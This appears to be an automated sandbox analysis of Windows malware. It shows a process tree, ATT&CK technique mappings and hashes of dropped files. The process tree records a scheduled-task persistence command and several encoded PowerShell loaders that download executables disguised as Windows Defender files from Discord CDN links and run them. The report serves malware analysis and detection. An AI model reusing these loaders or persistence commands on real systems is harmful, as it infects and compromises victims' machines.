"cmd" /C schtasks /create /tn \SecurityHealthService /tr "C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
6⤵
PID:3700

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn \SecurityHealthService /tr "C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
7⤵
- Creates scheduled task(s)
PID:4352

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
6⤵
PID:3392

C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\gK2VEroS6X.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:4428

C:\Users\Admin\AppData\Local\Temp\gK2VEroS6X.exe
C:\Users\Admin\AppData\Local\Temp\gK2VEroS6X.exe
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2608

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAaAB0ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA5ADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANAA5ADQAMQAwADIAMQA3ADQAMgAwADUAMwAzADgAMgAwAC8AMQAwADQAOQA0ADEANwA1ADgAMQA2ADEAMQA3ADMAMwAxADEAMwAvAFcAaQBuAGQAbwB3AHMARABlAGYAZQBuAGQAZQByAFMAbQBhAHIAdAB0AFMAYwByAGUAZQBuAC4AZQB4AGUAJwAsACAAPAAjAGMAYQB4ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAZwBzAHQAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdwB2AGkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATQBOAFoAWABIAEEAMwA2AC4AZQB4AGUAJwApACkAPAAjAHUAdQBrACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHkAbgBmACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBrAG0AcwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBNAE4AWgBYAEgAQQAzADYALgBlAHgAZQAnACkAPAAjAHQAdQBzACMAPgA="
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3936

C:\Users\Admin\AppData\Roaming\MNZXHA36.exe
"C:\Users\Admin\AppData\Roaming\MNZXHA36.exe"
5⤵
- Executes dropped EXE
PID:3848

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3848 -s 804
6⤵
- Program crash
PID:4068

C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\du5RtBTvBZ.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:4604

C:\Users\Admin\AppData\Local\Temp\du5RtBTvBZ.exe
C:\Users\Admin\AppData\Local\Temp\du5RtBTvBZ.exe
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2252

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAdgB2ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADEAMAA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAA0ADkANAAxADAAMgAxADcANAAyADAANQAzADMAOAAyADAALwAxADAANAA5ADQAMQA3ADUAOQA5ADcANwA3ADIANQA1ADUAMgA0AC8AVwBpAG4AZABvAHcAcwBEAGUAZgBlAG4AZABlAHIAUwBtAGEAcgB0AHQAUwBjAHIAZQBlAG4ALgBlAHgAZQAnACwAIAA8ACMAdABxAGwAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBtAGcAZQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBlAGoAYgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBQAE8ASQBYAEMAQgAzAC4AZQB4AGUAJwApACkAPAAjAHgAcQBnACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHYAbAB0ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwB2AGwAYQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBQAE8ASQBYAEMAQgAzAC4AZQB4AGUAJwApADwAIwB3AHEAZgAjAD4A"
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1472

C:\Users\Admin\AppData\Roaming\POIXCB3.exe
"C:\Users\Admin\AppData\Roaming\POIXCB3.exe"
5⤵
- Executes dropped EXE
- Adds Run key to start application
PID:3960

C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\iisFNkBRjf.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:4728

C:\Users\Admin\AppData\Local\Temp\iisFNkBRjf.exe
C:\Users\Admin\AppData\Local\Temp\iisFNkBRjf.exe
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4016

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAZwBnACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADMAMAA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAA0ADkANAAxADAAMgAxADcANAAyADAANQAzADMAOAAyADAALwAxADAANAA5ADQAMQA3ADYANQAwADAANQA0ADMANgA5ADIAOAAwAC8AaQBvAGQAaQBwAHAAYwBtAG0AbAAuAGUAeABlACcALAAgADwAIwBjAG0AagAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHoAYgBhACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHYAZwBtACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEIAVgBOAE0AWABDAEcASABKADcALgBlAHgAZQAnACkAKQA8ACMAaQB1AGkAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbAB1AHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHIAdwBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEIAVgBOAE0AWABDAEcASABKADcALgBlAHgAZQAnACkAPAAjAGcAZAB1ACMAPgA="
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3964

C:\Users\Admin\AppData\Roaming\BVNMXCGHJ7.exe
"C:\Users\Admin\AppData\Roaming\BVNMXCGHJ7.exe"
5⤵
- Executes dropped EXE
PID:112

C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\fw7g9vhRbO.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:3452

C:\Users\Admin\AppData\Local\Temp\fw7g9vhRbO.exe
C:\Users\Admin\AppData\Local\Temp\fw7g9vhRbO.exe
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2092

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAYgByACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADUAMAA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAA0ADkANAAxADAAMgAxADcANAAyADAANQAzADMAOAAyADAALwAxADAANAA5ADQAMQA3ADYANQA5ADIAMQA4ADkAMgA3ADYANgA2AC8AVwBDAHIAbwBuAFMAZQBjAHUAcgBpAHQAeQBfAHAAcgBvAHQAZQBjAHQAZQBkAC4AZQB4AGUAJwAsACAAPAAjAGUAeQBzACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAdgBtAHUAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAawBjAGMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUQBIAEcASgBBAFMARAAyADcALgBlAHgAZQAnACkAKQA8ACMAdwB4AGUAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAegBpAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAG4AdgBlACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFEASABHAEoAQQBTAEQAMgA3AC4AZQB4AGUAJwApADwAIwBmAHAAcAAjAD4A"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3332

C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\MA9xws7BZE.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:4536

C:\Users\Admin\AppData\Local\Temp\MA9xws7BZE.exe
C:\Users\Admin\AppData\Local\Temp\MA9xws7BZE.exe
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2272

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHkAbgBlACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADcAMAA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAA0ADkANAAxADAAMgAxADcANAAyADAANQAzADMAOAAyADAALwAxADAANAA5ADQAMQA3ADYANwA3ADYAOQA0ADgAMwA2ADgAMgA3AC8ARABlAGYAZQBuAGQAZQByAFMAYwByAGUAZQBlAG4ALgBlAHgAZQAnACwAIAA8ACMAZwBqAHgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB0AGMAeAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBmAHIAdwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBMAEsAUwBKAEQAUwBBAEsARABRAC4AZQB4AGUAJwApACkAPAAjAGwAZwB3ACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGMAcABhACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBkAGIAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBMAEsAUwBKAEQAUwBBAEsARABRAC4AZQB4AGUAJwApADwAIwBwAGsAaQAjAD4A"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:512

C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\upr2HxK3s0.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:1384

C:\Users\Admin\AppData\Local\Temp\upr2HxK3s0.exe
C:\Users\Admin\AppData\Local\Temp\upr2HxK3s0.exe
3⤵
- Executes dropped EXE
- Checks computer location settings
PID:1764

C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\kk3hyRianI.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:5112

C:\Users\Admin\AppData\Local\Temp\kk3hyRianI.exe
C:\Users\Admin\AppData\Local\Temp\kk3hyRianI.exe
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1604

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAagB5ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADkAMAA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAA0ADkANAAxADAAMgAxADcANAAyADAANQAzADMAOAAyADAALwAxADAANAA5ADQAMQA3ADgAMQAwADUAOAA3ADEANgA0ADcAOAAyAC8AdwBJAE4AUgBBAFIALgBlAHgAZQAnACwAIAA8ACMAbQByAHUAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBxAHMAdQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBrAGkAYgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBMAEsAWABNAE4AQgBaAFgANQA1AC4AZQB4AGUAJwApACkAPAAjAHEAYwB5ACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGgAcQB4ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBlAHoAdQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBMAEsAWABNAE4AQgBaAFgANQA1AC4AZQB4AGUAJwApADwAIwBqAGkAZwAjAD4A"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1872

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAeQBwACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAyADEAMAA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAA0ADkANAAxADAAMgAxADcANAAyADAANQAzADMAOAAyADAALwAxADAANAA5ADQAMQA3ADYAOQA2ADMAMAA0ADkANwA1ADkAOQAyAC8AVwBpAG4AZABvAHcAcwBTAGgAZQBlAGwASABvAHMALgBlAHgAZQAnACwAIAA8ACMAawBiAGQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBkAHAAYgAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBwAGYAYQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBMAEsAWABNAE4AWAA1ADUALgBlAHgAZQAnACkAKQA8ACMAdwBnAHIAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAYQByAGMAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGsAYgBsACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwASwBYAE0ATgBYADUANQAuAGUAeABlACcAKQA8ACMAcwB6AGIAIwA+AA=="
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4772

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3848 -ip 3848
1⤵
PID:4572

C:\Users\Admin\AppData\Roaming\JDSG3.exe
C:\Users\Admin\AppData\Roaming\JDSG3.exe
1⤵
- Executes dropped EXE
PID:1944

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
556084f2c6d459c116a69d6fedcc4105

SHA1
633e89b9a1e77942d822d14de6708430a3944dbc

SHA256
88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

SHA512
0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\JDSG3.exe.log
Filesize
902B

MD5
317ed182314a105b8436cfd8bb3879f6

SHA1
aa407b44619a9b06b18d8a39ce27a65b959598e1

SHA256
34a156e5235a27901293bd8928b37d13724d62183e409f6d284110280c56f865

SHA512
27bc617005ef36be6384484e5cec56d7165d1e9535c9a0b5546f1f082cc4bf5969acb573da77171ac7f4119c8cf50a3ced103cd21485569c9cfcf2e340468604

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.log
Filesize
425B

MD5
4eaca4566b22b01cd3bc115b9b0b2196

SHA1
e743e0792c19f71740416e7b3c061d9f1336bf94

SHA256
34ba0ab8d1850e7825763f413142a333ccbc05fa2b5499a28a7d27b8a1c5b4bb

SHA512
bc2b1bf45203e3bb3009a7d37617b8f0f7ffa613680b32de2b963e39d2cf1650614d7035a0cf78f35a4f5cb17a2a439e2e07deaefd2a4275a62efd0a5c0184a1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
9faf6f9cd1992cdebfd8e34b48ea9330

SHA1
ae792d2551c6b4ad5f3fa5585c0b0d911c9f868e

SHA256
0c45700b2e83b229e25383569b85ddc0107450c43443a11633b53daf1aaed953

SHA512
05b34627f348b2973455691bcb7131e4a5236cfece653d22432746ccd14d211b9b279f0913fbd7bb150f00eb2f2c872f4f5518f3903e024699fd23c50d679e97

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
eea470ed6df299fbc1b513b13824dd68

SHA1
126e4ec1f0fbdbbf12f4a843560c117f5932b6ee

SHA256
a7aaf7d6c654e2fd2af16f1b277696c5cdc600d5c28cb240c2c72181523b60d1

SHA512
bf6416bf02cc42f288bd5fbe6ff25c5dc7c649b3ef6f2939fad2228b386c899eb762e0c726b11fb453f194063162ffb1b8f1c9f3b6c4fc666c00b6ceaaf5ffcf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
eea470ed6df299fbc1b513b13824dd68

SHA1
126e4ec1f0fbdbbf12f4a843560c117f5932b6ee

SHA256
a7aaf7d6c654e2fd2af16f1b277696c5cdc600d5c28cb240c2c72181523b60d1

SHA512
bf6416bf02cc42f288bd5fbe6ff25c5dc7c649b3ef6f2939fad2228b386c899eb762e0c726b11fb453f194063162ffb1b8f1c9f3b6c4fc666c00b6ceaaf5ffcf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
19KB

MD5
2f2aa394bbd604f1745eb29b126d8892

SHA1
e61102ed7adf33e6463da3861f2675f3e6a05dcd

SHA256
a206531daae26697ca9062b8072ea32052c9d3fee75d7844f30d3c23c8161f45

SHA512
a73b3987cb5aac436dddb2fc66fddc9b267b2e3254044437d60909dbb08e4e86d506d1236f1ef761308c4ac5714378d10e5505df150e31034f0f16d07e54d123

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
2160607dcc3e24ae61326fc6b1a82ac6

SHA1
79375e39ee07a1ba3d011ffaf4c1b356ada8f8fb

SHA256
c819f476a3a6079782cde7fc3b7fadcb927131b9bcc278d8279720096e883e28

SHA512
b33fa85aeb41e880edf833e221dfda2f71f6469ce1dcbcee614ed1019417b3b357d7024f1e1c91a4d7b1c37e8f56764cdc27d6549df54cec9fb4d9ec5bc42281

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
2160607dcc3e24ae61326fc6b1a82ac6

SHA1
79375e39ee07a1ba3d011ffaf4c1b356ada8f8fb

SHA256
c819f476a3a6079782cde7fc3b7fadcb927131b9bcc278d8279720096e883e28

SHA512
b33fa85aeb41e880edf833e221dfda2f71f6469ce1dcbcee614ed1019417b3b357d7024f1e1c91a4d7b1c37e8f56764cdc27d6549df54cec9fb4d9ec5bc42281

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
e6805594fb24d590e8a019408f56d2df

SHA1
0a06083c3ea0cdf3c644be2c1c21089510276865

SHA256
3f82bf7f2c583a5427bc2e80acabaaf551cf6ec5a912c5cdfc928fb14a39d015

SHA512
7878917f3be745aa86cc881aa05329ec5e5905fcaca233d08f8a95fc6e07c620a6e3e60d4fc60cc630292fb62b83da4e02753b2d64ba501c32b4cc2cb6715bc0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
affb533afd518ad343800a0868062ca7

SHA1
795af694569e97c942fc8184eb31a01ffb2354ad

SHA256
858a2981f5a31384edc5c0a8c3fd24d2bc60a1f4cbb822a6ced7e0e7eaeea0aa

SHA512
6b79dde0e93bfb9ed9ed7287a92b56697f325fc05965121020644b4e5b245861c323c59c1076ff1380b36c61a7f13e53993febba6ddf7700103685b094ec9b00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
51ac5e85a2a5d90e06821327dbdb0e8a

SHA1
b12ebae76431d6cc91338de119264b060af1874e

SHA256
94f9b8257253dca54da6d5e1daf024acc4177b809bd69fd9acb9d533f6a8dc4f

SHA512
728b0f6f611cba341c47100faf55ff5ae6e3bd17150841ce015541d1479959486bc7c04c14bd7e5e84e8888a0a868aa7312b9933cbd82758a754bf8267978276

Download Submit
C:\Users\Admin\AppData\Local\Temp\MA9xws7BZE.exe
Filesize
7KB

MD5
58bc4287f86224a260e71811f7cf43e3

SHA1
28df4da8b40c5404ae3e283bcd7559ca7ab944f9

SHA256
8459beda7a3d1091523b5bcd0c41eba53644156b52005013a98abd18a2042680

SHA512
c2c203c64e0e45e1c1ec436a844b041c5fd15a310f7e406d2f5069f237a64ef3f35bd69834f6aa5b9b739399257eea74452aae503742519314fd2e64cb403846

Download Submit
C:\Users\Admin\AppData\Local\Temp\MA9xws7BZE.exe
Filesize
7KB

MD5
58bc4287f86224a260e71811f7cf43e3

SHA1
28df4da8b40c5404ae3e283bcd7559ca7ab944f9

SHA256
8459beda7a3d1091523b5bcd0c41eba53644156b52005013a98abd18a2042680

SHA512
c2c203c64e0e45e1c1ec436a844b041c5fd15a310f7e406d2f5069f237a64ef3f35bd69834f6aa5b9b739399257eea74452aae503742519314fd2e64cb403846

Download Submit
C:\Users\Admin\AppData\Local\Temp\VJW2wRNe8y.exe
Filesize
6KB

MD5
aacae33f1697d56d6ebbe91f49426380

SHA1
043d947a5ba9db57da8804ee1b3db6411c36a317

SHA256
e03373744068eb32bc09755df8ff0f111f93a47d94a9cca7513adac83a92d081

SHA512
a150a3f35b00e7553d5aabb6e524cd0770d10714cd255665f4355f9922b91d400d2d2c0c276b18dba2bd999da210a4538754da9f38b819d2a2b3c947a75f6c20

Download Submit
C:\Users\Admin\AppData\Local\Temp\VJW2wRNe8y.exe
Filesize
6KB

MD5
aacae33f1697d56d6ebbe91f49426380

SHA1
043d947a5ba9db57da8804ee1b3db6411c36a317

SHA256
e03373744068eb32bc09755df8ff0f111f93a47d94a9cca7513adac83a92d081

SHA512
a150a3f35b00e7553d5aabb6e524cd0770d10714cd255665f4355f9922b91d400d2d2c0c276b18dba2bd999da210a4538754da9f38b819d2a2b3c947a75f6c20

Download Submit
C:\Users\Admin\AppData\Local\Temp\aiWaVZJqnm.exe
Filesize
6KB

MD5
43092801b433d21c31682428366f4e4c

SHA1
2935b85e09a0f78224755a6ebd443cf067705ade

SHA256
9ba3d5c38a92abe046af042f657dba1d4e995add4d7f19fb0317e7d5f7c4efea

SHA512
680a7ab8d7f5ed6222451ed50806040b3ad1454d4d4aa737ff205614277cb57b294c707148fbb6aa4cd68d5ceb48454d3d9396fa795da29469692e3bb7eab873

Download Submit
C:\Users\Admin\AppData\Local\Temp\aiWaVZJqnm.exe
Filesize
6KB

MD5
43092801b433d21c31682428366f4e4c

SHA1
2935b85e09a0f78224755a6ebd443cf067705ade

SHA256
9ba3d5c38a92abe046af042f657dba1d4e995add4d7f19fb0317e7d5f7c4efea

SHA512
680a7ab8d7f5ed6222451ed50806040b3ad1454d4d4aa737ff205614277cb57b294c707148fbb6aa4cd68d5ceb48454d3d9396fa795da29469692e3bb7eab873

Download Submit
C:\Users\Admin\AppData\Local\Temp\dnZucbVxTJ.exe
Filesize
7KB

MD5
5d9fea16ab0d9224b54d72e2321bcaff

SHA1
499d709c1cbc22caf4e5efda230fb4a158714ea4

SHA256
dfe55f766e02d90c2f1c1794ee9fe59d6cd3ddec6a36b03f16fcb9ee58fc8d06

SHA512
c685ad6526099d126a47528e5230924fdf0762d2b35a0ca73afc1851ec6b4cbb931c08fcd3e419348a10365b04bb44b5561e0f191e4b4793433fd64e118049b4

Download Submit
C:\Users\Admin\AppData\Local\Temp\dnZucbVxTJ.exe
Filesize
7KB

MD5
5d9fea16ab0d9224b54d72e2321bcaff

SHA1
499d709c1cbc22caf4e5efda230fb4a158714ea4

SHA256
